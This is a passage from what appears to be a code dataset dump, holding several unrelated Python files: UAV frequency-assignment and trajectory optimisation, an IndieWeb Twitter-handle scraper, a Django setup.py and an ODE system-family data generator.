list(g_sub.adj[lowest_vertex])\n for neighbor in neighbors:\n g_sub.remove_node(neighbor)\n cc.remove(neighbor)\n\n #remove the vertex and its edges from consideration completely\n g_sub.remove_node(lowest_vertex)\n g.remove_node(lowest_vertex)\n cc.remove(lowest_vertex)\n\n #print(g.nodes())\n\n \n #change range factor\n range_factor *= 0.95\n\n #print(f)\n t_end = time.time()\n \n freq_assignment_dict = {}\n for freq in F:\n freq_assignment_dict[freq] = []\n\n #proposed\n for i, freq in enumerate(f):\n freq_assignment_dict[freq].append(i)\n\n #FDMA\n #for i, freq in enumerate(F):\n # freq_assignment_dict[freq].append(i)\n\n #print(\"[color] time:\", t_end - t_start)\n print(\"[color] range_fac:\", range_factor)\n print(\"[color] assign:\", freq_assignment_dict)\n\n self.plotter.plot_graph(g_freqs[0], self.gt, f)\n return freq_assignment_dict\n\n #assign all vehicles to a single freq\n def naive_freq(self, freq):\n freq_assignments = {}\n uav_idxs = list(range(len(self.g_gt.nodes())))\n freq_assignments[freq] = uav_idxs\n return freq_assignments\n\n\n#apply curr_id to all nodes in connected component \ndef visit_node(g, i, visited, cc_id, curr_id):\n num_visited = 0\n\n if visited[i] != 1:\n visited[i] = 1\n if curr_id >= len(cc_id):\n cc_id.append([i])\n else:\n cc_id[curr_id].append(i)\n\n num_visited += 1\n\n #print(i)\n for v in g.adj[i]:\n num_visited += visit_node(g, v, visited, cc_id, curr_id)\n\n return num_visited\n\ndef slice_freq(idxs, a, q, p, d, I, gt):\n \n #print(idxs)\n idxs = np.array(idxs)\n\n a_f = a[idxs]\n q_f = q[idxs]\n p_f = p[idxs]\n I_f = I[idxs]\n gt_f = gt[idxs]\n\n d_f = d[idxs[:, None], idxs]\n #print(d_f.shape)\n\n return a_f, q_f, p_f, d_f, I_f, gt_f\n\ndef shen_sca(e, K, M, GT):\n\n p = np.zeros((K, M))\n q = np.zeros((K, M, 2))\n a = np.zeros((K, M))\n d = np.zeros((K, K, M))\n I = np.zeros((K, M))\n gt = GT\n gamma = 0.01\n eps = 0.01 #itr tolerance\n\n #drone trajectory init\n for i in range(K):\n q[i][0][0] = random.uniform(e.p_bounds[0][0], e.p_bounds[0][1])\n q[i][0][1] = random.uniform(e.p_bounds[1][0], e.p_bounds[1][1])\n\n x_step = (e.gt[i][0] - q[i][0][0]) / M\n y_step = (e.gt[i][1] - q[i][0][1]) / M\n for n in range(M):\n q[i][n][0] = q[i][0][0] + x_step * n\n q[i][n][1] = q[i][0][1] + y_step * n\n \n #drone power init\n for n in range(M):\n for k in range(K):\n p[k][n] = 1\n\n print('[shen] init SCA: k: %d m: %d gt: %s' % (K, M, GT))\n \n #init trajectory q and power p foor all k and n\n #store 2 sets of q and p for previous and current iteration\n #TODO\n\n #determine initial R given p and q\n for n in range(M):\n for k in range(K):\n a[k][n] = math.sqrt(p[k][n])\n\n I[k][n] = 0\n for j in range(K):\n d[j][k][n] = utils.dist(q[j][n], gt[k])**2\n I[k][n] += gamma * a[j][n]**2 / d[j][k][n]\n I[k][n] -= gamma * a[k][n]**2 / d[k][k][n]\n shen_r = utils.shen_rpq(a, q, d, I, gt, gamma)\n print(\"[shen] R: %.2f\" % (shen_r))\n\n #visualize and print\n e.plot_traj(q, gt)\n for k in range(K):\n for n in range(M):\n if n % 5 == 0:\n print(\"[shen] q:[%.2f %.2f] a:%.2f\" % (q[k][n][0], q[k][n][1], a[k][n]))\n print()\n\n itr = 0\n while True:\n var_a, var_q = optimize_shen(a, q, p, d, I, gt, gamma)\n \n #update a, q, p\n for idx in range(K * M):\n a[idx // M][idx % M] = var_a.level()[idx]\n p[idx // M][idx % M] = a[idx // M][idx % M]**2\n\n q[idx // M][idx % M][0] = var_q.level()[idx * 2]\n q[idx // M][idx % M][1] = var_q.level()[idx * 2 + 1]\n \n #update a, d, I with p, q\n for n in range(M):\n for k in range(K):\n a[k][n] = math.sqrt(p[k][n])\n \n 
I[k][n] = 0\n for j in range(K):\n d[j][k][n] = utils.dist(q[j][n], gt[k])**2\n I[k][n] += gamma * a[j][n]**2 / d[j][k][n]\n I[k][n] -= gamma * a[k][n]**2 / d[k][k][n]\n\n #update R by eq 4 using shen_rpq\n shen_r_new = utils.shen_rpq(a, q, d, I, gt, gamma)\n print(\"[shen] R: %.2f\" % (shen_r_new))\n \n #visualize and print\n e.plot_traj(q, gt)\n for k in range(K):\n for n in range(M):\n if n % 5 == 0:\n print(\"[shen] q:[%.2f %.2f] a:%.2f\" % (q[k][n][0], q[k][n][1], a[k][n]))\n print()\n\n #continue if prev r was 0\n if shen_r <= 0: \n shen_r = shen_r_new\n continue\n\n #termination condition\n '''\n if ((shen_r_new - shen_r) / (shen_r)) < eps:\n print(\"term\")\n time.sleep(30)\n break\n '''\n\n #update iteration\n shen_r = shen_r_new\n\n itr += 1\n if itr % 5 == 0:\n pass\n\n p = np.multiply(a, a)\n return p, q\n\ndef optimize_shen(a, q, p, d, I, gt, gamma, v_max=0.2, h_min=0.2):\n d_min = 0.0\n\n K, M = a.shape\n\n #print(K,M)\n #update a, q by solving complex problem 23\n m = mf.Model('shen_sca')\n var_a = m.variable('a', [K, M], mf.Domain.inRange(0.1, 31.6))\n var_q = m.variable('q', [K, M, 2], mf.Domain.inRange(-500, 500))\n var_dist = m.variable('dist_expr', [K, K, M], mf.Domain.greaterThan(0.0))\n var_inner = m.variable('inner_div', [K, K, M])\n var_t = m.variable('t', [K, M, K])\n\n #fixed starting loc\n for k in range(K):\n m.constraint(mf.Expr.sub(var_q.index(k, 0, 0), q[k][0][0]), mf.Domain.equalsTo(0.0))\n m.constraint(mf.Expr.sub(var_q.index(k, 0, 1), q[k][0][1]), mf.Domain.equalsTo(0.0))\n \n #define expression for 20c in Shen 2020\n inner_1 = np.empty((K, M), dtype=object)\n inner_2 = np.empty((K, K, M), dtype=object)\n\n #for each n, k, create R_k(a[n],q[n],a_r[n],q_r[n]) and add the expressions together for objective\n obj_expr = mf.Expr.constTerm(0)\n for n in range(M):\n for k in range(K):\n\n inner_1[k][n] = mf.Expr.zeros(1)\n t_1_idx = 0\n for j in range(K): \n\n #t[0] computations\n #var_dist >= sqrt(x_dist^2 + y_dist^2 +z_dist^2)\n m.constraint('dist_%d_%d_%d' % (j, k, n), mf.Expr.vstack([\n mf.Expr.constTerm(0.5), \n var_dist.index(j, k, n), \n mf.Expr.sub(var_q.index(j, n, 0), gt[k][0]), \n mf.Expr.sub(var_q.index(j, n, 1), gt[k][1]),\n mf.Expr.constTerm(h_min)]), mf.Domain.inRotatedQCone())\n\n #inner_1[k][n] = mf.Expr.add(inner_1[k][n], mf.Expr.mul(-1.0 * gamma * p[j][n] / d[j][k][n]**2, var_dist.index(j, k, n)))\n inner_1[k][n] = mf.Expr.add(inner_1[k][n], mf.Expr.sub(mf.Expr.mul(2 * a[j][n] / d[j][k][n], var_a.index(j, n)), mf.Expr.mul(a[j][n]**2 / d[j][k][n]**2, var_dist.index(j, k, n))))\n\n #t[1] computations\n if j != k:\n dist_temp = np.zeros((3))\n dist_temp[0] = q[j][n][0] - gt[k][0]\n dist_temp[1] = q[j][n][1] - gt[k][1]\n dist_temp[2] = h_min\n inner_2[j][k][n] = mf.Expr.add(d[j][k][n], mf.Expr.dot(2 * (dist_temp), mf.Expr.hstack([mf.Expr.sub(var_q.index(j, n, 0), q[j][n][0]), mf.Expr.sub(var_q.index(j, n, 1), q[j][n][1]), mf.Expr.constTerm(0)])))\n m.constraint('inner_%d_%d_%d' % (j, k, n), mf.Expr.vstack([mf.Expr.mul(0.5, var_inner.index(j, k, n)), inner_2[j][k][n], var_a.index(j, n)]), mf.Domain.inRotatedQCone())\n\n #t[1+j] >= gamma / (1 + I[k][n]) * inner_2[k][n]\n m.constraint('t1_%d_%d_%d' % (j, k, n), mf.Expr.sub(var_t.index(k, n, 1 + t_1_idx), mf.Expr.mul(gamma / (1 + I[k][n]), var_inner.index(j, k, n))), mf.Domain.greaterThan(0.0))\n t_1_idx += 1\n\n '''\n #t[2] >= -log(1 + I[k][n])\n m.constraint('t2_%d_%d_%d' % (j, k, n), mf.Expr.hstack(mf.Expr.constTerm(1 + I[k][n]), 1, var_t.index(k, n, 2)), mf.Domain.inPExpCone())\n \n #t[3] >= 
I[k][n] / (1 + I[k][n])\n m.constraint('t3_%d_%d_%d' % (j, k, n), mf.Expr.sub(var_t.index(k, n, 3), mf.Expr.constTerm(I[k][n] / (1 + I[k][n]))), mf.Domain.greaterThan(0.0))\n '''\n \n '''\n #min sep constraint\n if j > k:\n dist_jk = q[k][n] - q[j][n]\n dist_jk = np.abs(dist_jk)\n #print(j, k, n, dist_jk)\n #print(mf.Expr.dot(dist_jk, mf.Expr.vstack([mf.Expr.sub(var_q.index(k, n, 0), var_q.index(j, n, 0)), mf.Expr.sub(var_q.index(k, n, 1), var_q.index(j, n, 1))])))\n #print(dist_jk)\n m.constraint('min_sep_%d_%d_%d' % (j, k, n), mf.Expr.vstack([\n mf.Expr.constTerm(1), \n mf.Expr.add(mf.Expr.mul(dist_jk[0], var_q.index(k, n, 0)))\n #mf.Expr.dot(dist_jk, mf.Expr.vstack([mf.Expr.sub(var_q.index(k, n, 0), var_q.index(j, n, 0)), mf.Expr.sub(var_q.index(k, n, 1), var_q.index(j, n, 1))])), \n mf.Expr.constTerm(q[k][n][0] - q[j][n][0]), \n mf.Expr.constTerm(q[k][n][1] - q[j][n][1]), \n mf.Expr.constTerm(d_min)]), \n mf.Domain.inRotatedQCone())\n '''\n\n #t[0] <= log(1 + gamma * inner_1)\n #inner_1[k][n] = mf.Expr.sub(mf.Expr.mul(2 * a[k][n] / d[k][k][n], var_a.index(k, n)), mf.Expr.mul(a[k][n]**2 / d[k][k][n]**2, var_dist.index(k, k, n)))\n m.constraint('t0_%d_%d' % (k, n), mf.Expr.hstack(\n mf.Expr.add(1, mf.Expr.mul(gamma, inner_1[k][n])), \n 1, \n var_t.index(k, n, 0)), mf.Domain.inPExpCone())\n \n #flight speed constraint\n if n < M - 1:\n m.constraint('speed_%d_%d' % (k, n), mf.Expr.vstack([mf.Expr.constTerm(v_max), mf.Expr.sub(var_q.index(k, n + 1, 0), var_q.index(k, n, 0)), mf.Expr.sub(var_q.index(k, n + 1, 1), var_q.index(k, n, 1))]), mf.Domain.inQCone())\n \n obj_expr = mf.Expr.add(obj_expr, mf.Expr.dot(var_t.slice([k, n, 0], [k + 1, n + 1, K]), [0.693147] + [-1 for x in range(K - 1)]))\n\n m.objective('obj_rate', mf.ObjectiveSense.Maximize, obj_expr)\n m.setSolverParam(\"intpntCoTolRelGap\", 1.0e-5)\n #m.setSolverParam(\"intpntCoTolRelGap\", 1.0e-8)\n\n #m.setLogHandler(sys.stdout)\n #m.writeTask('shen_sca.opf')\n m.solve()\n\n #print(m.getProblemStatus())\n #print(\"[opt] %f\" % (m.primalObjValue()))\n #print(var_a.level(), var_q.level())\n return var_a, var_q, m.primalObjValue()\n\n","repo_name":"jmagine/multiuav-rf","sub_path":"sim/opt.py","file_name":"opt.py","file_ext":"py","file_size_in_byte":21996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
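# A minimal baseline sketch (not from the repo above) for the frequency
# assignment idea in color_graph: networkx's built-in greedy coloring maps
# nodes to color indices, which can then be folded onto a sorted frequency
# list, reusing frequencies when colors outnumber them.
import networkx as nx

def greedy_freq_assignment(g, F):
    coloring = nx.coloring.greedy_color(g, strategy="largest_first")
    F = sorted(F, reverse=True)
    assignment = {f: [] for f in F}
    for node, color in coloring.items():
        assignment[F[color % len(F)]].append(node)
    return assignment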
+{"seq_id":"9738834947","text":"#!/usr/bin/env python3\nimport mf2py\nimport re\nimport requests\nimport logging\nfrom concurrent.futures import ThreadPoolExecutor\nimport json\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urljoin \n\ndef all_hcards(items):\n hcards = []\n for item in items:\n if isinstance(item, dict):\n if 'h-card' in item['type']:\n hcards.append(item)\n hcards += all_hcards(item.get('children', []))\n hcards += all_hcards(item.get('properties', {}).get('attendee', []))\n return hcards\n \n\ndef find_screen_name(url):\n try:\n print('fetching', url)\n r = requests.get(url, timeout=10)\n p = mf2py.parse(url=url)\n for me in p.get('rels', {}).get('me', []):\n m = re.match(r'https?://(?:www.)?twitter.com/@?([\\w]+)/?', me)\n if m:\n return m.group(1)\n except:\n logging.error('problem fetching %s', url)\n \n\nall_urls = []\n\nprint('fetching irc-people')\np = mf2py.parse(url='https://indiewebcamp.com/irc-people')\nfor hcard in all_hcards(p.get('items', [])):\n urls = hcard.get('properties', {}).get('url', [])\n if urls:\n all_urls.append(urls[0])\n\nprint('fetching guest lists')\nr = requests.get('https://indiewebcamp.com/Category:Guest_List')\nsoup = BeautifulSoup(r.text)\nguest_lists = []\nfor a in soup.find_all('a'):\n if 'Guest_List' in a.get('href', ''):\n guest_lists.append(urljoin('https://indiewebcamp.com/', a.get('href')))\n\nfor guest_list in sorted(set(guest_lists)):\n print('fetching', guest_list)\n p = mf2py.parse(url=guest_list)\n for hcard in all_hcards(p.get('items', [])):\n urls = hcard.get('properties', {}).get('url', [])\n if urls:\n all_urls.append(urls[0])\n\nwith open('domains.json', 'w') as f:\n json.dump(sorted(set(filter(None, all_urls))), f, indent=True)\n\nwith ThreadPoolExecutor(max_workers=25) as executor:\n screen_names = executor.map(find_screen_name, sorted(set(filter(None, all_urls))))\n\nwith open('names.json', 'w') as f:\n json.dump(list(set(filter(None, screen_names))), f, indent=True)\n","repo_name":"kylewm/indieweb-irc-people-twitter-list","sub_path":"fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"37337366079","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom os.path import join, dirname, abspath\nimport sys\n\nPY2 = sys.version_info[0] == 2\nROOT = dirname(abspath(__file__))\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup # NOQA\n\n\ndef read_relative_file(filename):\n \"\"\"\n Returns contents of the given file, whose path is supposed relative\n to this module.\n\n \"\"\"\n with open(join(ROOT, filename)) as f:\n return f.read()\n\n\nNAME = 'django-pimpmytheme'\nDESCRIPTION = (\"Customise theme (css and template) on a per user/client \"\n \"whatever basis\")\nREQUIREMENTS = [\n 'Django>=1.11,<2.0' if PY2 else 'Django>=1.11',\n 'django-compressor>=2.2',\n 'gitpython>1.0.0',\n]\n__VERSION__ = read_relative_file('VERSION').strip()\n\n\nparams = dict(\n name=NAME,\n description=DESCRIPTION,\n packages=['pimpmytheme'],\n version=__VERSION__,\n long_description=read_relative_file('README.rst'),\n author='Yohann Gabory',\n author_email='peopledoc@people-doc.com',\n url='https://github.com/peopledoc/django-pimpmytheme',\n license='MIT License',\n include_package_data=True,\n install_requires=REQUIREMENTS,\n zip_safe=False,\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Framework :: Django',\n 'Framework :: Django :: 1.11',\n 'Framework :: Django :: 2.0',\n ],\n)\n\nif __name__ == '__main__':\n setup(**params)\n","repo_name":"peopledoc/django-pimpmytheme","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"71"}
+{"seq_id":"69986474471","text":"import os\r\nimport torch\r\nimport pickle\r\nimport random\r\nimport itertools\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nfrom .ode_classes import *\r\nfrom twa.utils.utils import ensure_device, ensure_dir\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\nimport torch.nn.init as init\r\nfrom torch import nn\r\nfrom torch import distributions\r\nfrom torch.distributions import MultivariateNormal, Uniform, TransformedDistribution, SigmoidTransform\r\nfrom torch.nn.parameter import Parameter\r\n\r\nfrom .augmentations import augment_normalizing_flow\r\nfrom .ode import FlowSystemODE\r\n\r\n\r\n\r\n\r\n\r\nclass SystemFamily():\r\n \"\"\"\r\n Family of ODE or PDE systems\r\n \"\"\"\r\n\r\n @staticmethod\r\n def get_generator(data_name):\r\n \"\"\"\r\n Selecting supported ODE or PDE generator\r\n \"\"\"\r\n if data_name == 'simple_oscillator' or data_name == 'so':\r\n generator = SimpleOscillator\r\n\r\n elif data_name == 'selkov':\r\n generator = Selkov\r\n\r\n elif data_name == 'suphopf':\r\n generator = SupercriticalHopf\r\n\r\n elif data_name == 'subhopf':\r\n generator = SubcriticalHopf\r\n\r\n elif data_name == 'bzreaction' or data_name == 'bz':\r\n generator = BZreaction\r\n\r\n elif data_name == 'vanderpol' or data_name == 'vp':\r\n generator = VanDerPol\r\n\r\n elif data_name == 'lienard_poly':\r\n generator = LienardPoly\r\n \r\n elif data_name == 'lienard_sigmoid':\r\n generator = LienardSigmoid\r\n\r\n elif data_name == 'repressilator':\r\n generator = Repressilator\r\n else:\r\n raise ValueError(f'Unknown data, `{data_name}`! Try `simple_oscillator`.')\r\n\r\n return generator\r\n\r\n\r\n @staticmethod\r\n def get_sampler(sampler_type):\r\n \"\"\"\r\n Selecting supported sampler\r\n \"\"\"\r\n if (sampler_type == 'uniform') or (sampler_type == 'random'):\r\n sampler = SystemFamily.params_random\r\n elif sampler_type == 'extreme':\r\n sampler = SystemFamily.params_extreme\r\n elif sampler_type == 'sparse':\r\n sampler = SystemFamily.params_sparse\r\n elif sampler_type == 'control':\r\n sampler = SystemFamily.params_control\r\n elif sampler_type == 'constant':\r\n sampler = SystemFamily.params_constant\r\n else:\r\n print(sampler_type)\r\n raise ValueError('Param sampler not recognized.')\r\n\r\n return sampler\r\n\r\n\r\n\r\n def __init__(self, data_name, device=None, #min_dims=None, max_dims=None, num_lattice=None, labels=None, \r\n param_ranges=None, param_groups=None, seed=0, **kwargs):\r\n \"\"\"\r\n Generate a system family\r\n :param data_name: name of system\r\n :param param_ranges: range for each param in model, \r\n :param device: device to use\r\n :param min_dims: minimum range of dimensions to use\r\n :param max_dims: maximum range of dimensions to use\r\n :param kwargs: any arguments of a general system\r\n \"\"\"\r\n\r\n # torch.manual_seed(seed)\r\n # np.random.seed(seed)\r\n # random.seed(seed)\r\n\r\n self.data_name = data_name\r\n self.pde = False\r\n \r\n DE = SystemFamily.get_generator(self.data_name)\r\n # self.data_dir = os.path.abspath(data_dir) if data_dir is not None else '.'\r\n\r\n # if not provided, use ode suggested params\r\n self.param_ranges = DE.recommended_param_ranges if param_ranges is None else param_ranges\r\n self.param_groups = DE.recommended_param_groups if param_groups is None else param_groups\r\n # self.labels = DE.labels if labels is None else labels\r\n # self.min_dims = DE.min_dims 
if min_dims is None else min_dims\r\n # self.max_dims = DE.max_dims if max_dims is None else max_dims\r\n param_use_ode_defaults = ['min_dims', 'max_dims', 'labels', 'num_lattice']\r\n for p in param_use_ode_defaults:\r\n if p in kwargs.keys() and kwargs[p] is None:\r\n kwargs.pop(p)\r\n # general DE params\r\n self.device = ensure_device(device)\r\n params = self.params_random(1)\r\n DE_ex = DE(params=params[0], device=device, **kwargs)\r\n \r\n \r\n data_info = DE_ex.get_info()\r\n # data_info = {**self.__dict__, **data_info} # merge dictionaries\r\n self.data_info = data_info\r\n # self.num_lattice = num_lattice\r\n self.dim = DE_ex.dim\r\n self.DE = DE\r\n self.DE_ex = DE_ex\r\n if self.data_name != 'grayscott': # TODO: ask isinstance(generator, ODE/PDE)\r\n # TODO: can generator.param can be used as default?\r\n self.coords = self.DE_ex.generate_mesh() # min_dims, max_dims, num_lattice\r\n self.coords = self.coords.to(device).float()\r\n\r\n self.kwargs = kwargs\r\n\r\n # self.param_sampler = SystemFamily.get_sampler(sampler_type)\r\n\r\n def get_sf_info(self):\r\n sf_info = self.data_info.copy()\r\n sf_info['param_ranges'] = self.param_ranges\r\n sf_info['data_name'] = self.data_name\r\n return sf_info\r\n\r\n######################################## Param sampling methods ########################################################\r\n\r\n def params_random(self, num_samples):\r\n \"\"\"\r\n Return random sampling of params in range\r\n \"\"\"\r\n params = np.zeros((num_samples, len(self.param_ranges)))\r\n \r\n for i,p in enumerate(self.param_ranges):\r\n params[:, i] = np.random.uniform(low=p[0], high=p[1], size=num_samples)\r\n return params\r\n \r\n def params_constant(self, num_samples, fill_value=None):\r\n \"\"\"\r\n Return constant params\r\n \"\"\"\r\n param_values = [np.quantile([-1,1], 0.6) for p in self.param_ranges] if fill_value is None else fill_value\r\n params = np.repeat([param_values], num_samples, axis=0)\r\n \r\n return params\r\n\r\n def params_extreme(self, num_samples=None):\r\n \"\"\"\r\n Return array of extreme (minimal, and maximal bounds) param combinations\r\n \"\"\"\r\n # param_bounds = [torch.tensor([mn, mx]) for (mn, mx) in self.param_ranges]\r\n # mesh = torch.meshgrid(*param_bounds)\r\n # params = torch.cat([ms[..., None] for ms in mesh], dim=-1)\r\n\r\n nparams = len(self.param_ranges)\r\n lst = list(itertools.product([0, 1], repeat=nparams))\r\n params = np.zeros((len(lst), len(self.param_ranges)))\r\n for i, p in enumerate(lst):\r\n params[i] = [self.param_ranges[j][p[j]] for j in range(nparams)]\r\n\r\n return params\r\n\r\n def params_sparse(self, num_samples, p=0.5):\r\n \"\"\"\r\n Samples which parameters to set with Binomial distribution with probability p and then \r\n randomly assigns them (for families of many parameters)\r\n \"\"\"\r\n which_params = np.random.binomial(1, p, (num_samples, len(self.param_ranges)))\r\n params = self.params_random(num_samples)\r\n return (params * which_params)\r\n\r\n def params_control_single(self, max_coeff=3., prop_zero=.6, prop_non_unit=.3):\r\n\r\n # proportion of unit parameters\r\n prop_unit = 1 - prop_zero - prop_non_unit\r\n\r\n # Initialize parameter vector\r\n num_terms = int(len(self.param_ranges) / self.dim)\r\n x = (2*max_coeff) * torch.rand(num_terms, self.dim)\r\n\r\n # zero out `prop_zero` parameters\r\n coeffs = torch.where(x/(2*max_coeff) < prop_zero, torch.zeros_like(x), x)\r\n\r\n # Add 1 coeffs\r\n coeffs = torch.where((x/(2*max_coeff) >= prop_zero)*(x/(2*max_coeff)< (prop_zero + 
prop_unit/2)), torch.ones_like(coeffs), coeffs)\r\n\r\n # Add -1 coeffs\r\n coeffs = torch.where((x/(2*max_coeff) >=prop_zero + prop_unit/2)*(x/(2*max_coeff) < (prop_zero + prop_unit)), -1*torch.ones_like(coeffs), coeffs)\r\n\r\n # Add random coeffs\r\n coeffs = torch.where(x/(2*max_coeff)>prop_zero + prop_unit, (2*max_coeff) * torch.rand(num_terms, self.dim) - max_coeff, coeffs)\r\n\r\n # Are both equations identically 0?\r\n one_zero_eq = (coeffs.sum(0)[0] * coeffs.sum(0)[1] == 0)\r\n if one_zero_eq:\r\n # Make some parameters randomly +/- 1\r\n for i in range(self.dim):\r\n ind = np.random.randint(num_terms)\r\n sgn = 2 * torch.rand(1) - 1\r\n sgn /= sgn.abs()\r\n coeffs[ind,i] = sgn * 1.\r\n return coeffs.reshape(-1).numpy() #.unsqueeze(0).numpy()\r\n\r\n def params_control(self, num_samples, **kwargs): #TODO: TEMP\r\n \"\"\"\r\n Return array of control parameters (all parameters are zero except one)\r\n \"\"\"\r\n params = np.zeros((num_samples, len(self.param_ranges)))\r\n for i in range(num_samples):\r\n params[i] = self.params_control_single(**kwargs)\r\n return params\r\n \r\n######################################## Flow noise functions ########################################################\r\n\r\n def noise_vectors_gaussian(self, vectors, noise_level):\r\n \"\"\"\r\n Add gaussian noise to vectors\r\n \"\"\"\r\n noise = np.random.normal(scale=noise_level, size=vectors.shape)\r\n return vectors + noise\r\n\r\n def noise_vectors_mask(self, vectors, noise_level, empty_val=np.nan):\r\n \"\"\"\r\n Add mask noise to vectors\r\n \"\"\"\r\n vectors = vectors.copy()\r\n mask = np.random.uniform(size=np.array(vectors.shape)[:-1]) < noise_level\r\n vectors[mask, :] = empty_val #\r\n return vectors\r\n\r\n def noise_vectors(self, vectors, noise_type, noise_level):\r\n \"\"\"\r\n Add noise to parameters\r\n \"\"\"\r\n if noise_type == 'gaussian':\r\n return self.noise_vectors_gaussian(vectors, noise_level)\r\n if noise_type == 'mask':\r\n return self.noise_vectors_mask(vectors, noise_level)\r\n else:\r\n return vectors\r\n\r\n \r\n\r\n\r\n def augment_normalizing_flow_with_rejection(self, DE, ntries=10, **kwargs_aug):\r\n \"\"\"\r\n Augment normalizing flow with rejection sampling\r\n :param DE: FlowSystemODE\r\n \"\"\"\r\n \r\n for i in range(ntries):\r\n \r\n vectors_new, fixed_pts = augment_normalizing_flow(DE, **kwargs_aug)\r\n if fixed_pts is None:\r\n break\r\n\r\n fixed_pts_isin = DE.get_pts_isin(fixed_pts,)\r\n # is_inbound = True\r\n # for fp in fixed_pts:\r\n # inbound = [ (fp[i] >= DE.min_dims[i]) & (fp[i] <= DE.max_dims[i]) for i in range(DE.dim)]\r\n # is_inbound = is_inbound & np.all(inbound)\r\n \r\n \r\n if np.all(fixed_pts_isin): # checking if all points are inside\r\n break\r\n \r\n \r\n if (i == ntries-1):\r\n print(fixed_pts)\r\n print(i)\r\n print('Could not find a flow that flows inside the coords boundaries')\r\n\r\n\r\n return vectors_new, fixed_pts\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n######################################## Params noise functions ########################################################\r\n\r\n \r\n def noise_params(self, params, noise_type, noise_level):\r\n \"\"\"\r\n Add noise to parameters\r\n \"\"\"\r\n if noise_type == 'params_gaussian':\r\n return self.noise_vectors_gaussian(params, noise_level)\r\n else:\r\n return params\r\n\r\n######################################## Data generation ########################################################\r\n\r\n def generate_flows(self, num_samples, noise_type=None, noise_level=None, 
sampler_type='random', params=None, \r\n interpolate_missing=False, add_sand=False, add_traj=False, augment_type=None, augment_ntries=10, max_topos=3, T=100, alpha=0.1, **kwargs_aug):\r\n \"\"\"\r\n Generate original and perturbed params and flows\r\n \"\"\"\r\n \r\n sampler = SystemFamily.get_sampler(sampler_type)\r\n params = params if params else sampler(self, num_samples)\r\n \r\n params_pert = self.noise_params(params, noise_type, noise_level=noise_level)\r\n \r\n vectors = []\r\n vectors_pert = []\r\n\r\n DEs = []\r\n DEs_pert = []\r\n\r\n sand = []\r\n sand_pert = []\r\n\r\n trajs = []\r\n trajs_pert = []\r\n\r\n fixed_pts = []\r\n fixed_pts_pert = []\r\n\r\n dists = []\r\n dists_pert = []\r\n\r\n topos = []\r\n topos_pert = []\r\n\r\n poly_params = []\r\n poly_params_pert = []\r\n\r\n\r\n for p, p_pert in zip(params, params_pert):\r\n\r\n DE = self.DE(params=p, **self.data_info)\r\n coords, v = DE.get_vector_field()\r\n \r\n DE_pert = self.DE(params=p_pert, **self.data_info)\r\n\r\n if noise_type == 'trajectory':\r\n print('Works well in odes but not here, check!') # TODO: fix this\r\n _, v_pert = DE_pert.get_vector_field_from_trajectories(n_trajs=noise_level, T=5, alpha=0.01)\r\n # plt.quiver(coords[...,0], coords[...,1], v[...,0], v[...,1])\r\n # plt.quiver(coords[...,0], coords[...,1], v_pert[...,0], v_pert[...,1], color='r')\r\n else:\r\n _, v_pert = DE_pert.get_vector_field()\r\n\r\n # fixed points\r\n fp = DE.get_fixed_pts()\r\n if augment_type:\r\n v_pert, fp_pert = self.augment_normalizing_flow_with_rejection(DE_pert, augment_type=augment_type, ntries=augment_ntries, **kwargs_aug)\r\n else:\r\n fp_pert = DE_pert.get_fixed_pts()\r\n \r\n # distance from bifurcation\r\n dist = DE.get_dist_from_bifur()\r\n dist_pert = DE_pert.get_dist_from_bifur()\r\n \r\n no_pert = False\r\n if np.all(np.isclose(v, v_pert)):\r\n no_pert = True\r\n\r\n if add_sand:\r\n image = DE.get_sand_image()\r\n image_pert = image if no_pert else DE_pert.get_sand_image()\r\n sand.append(image)\r\n sand_pert.append(image_pert)\r\n\r\n if add_traj:\r\n init = [np.random.random() * (DE.max_dims[i] - DE.min_dims[i]) + DE.min_dims[i] for i in range(DE.dim)]\r\n traj = DE.run(T=T, alpha=alpha, init=torch.Tensor(init))\r\n init = [np.random.random() * (DE_pert.max_dims[i] - DE_pert.min_dims[i]) + DE_pert.min_dims[i] for i in range(DE_pert.dim)]\r\n traj_pert = traj if no_pert else DE_pert.run(T=T, alpha=alpha, init=torch.Tensor(init))\r\n trajs.append(traj)\r\n trajs_pert.append(traj_pert)\r\n \r\n tps = DE.get_topology()\r\n if len(tps) < max_topos:\r\n tps += [0] * (max_topos - len(tps))\r\n if len(tps) > max_topos:\r\n print(f'WARNING: more than {max_topos} topologies found for {self.data_name}. 
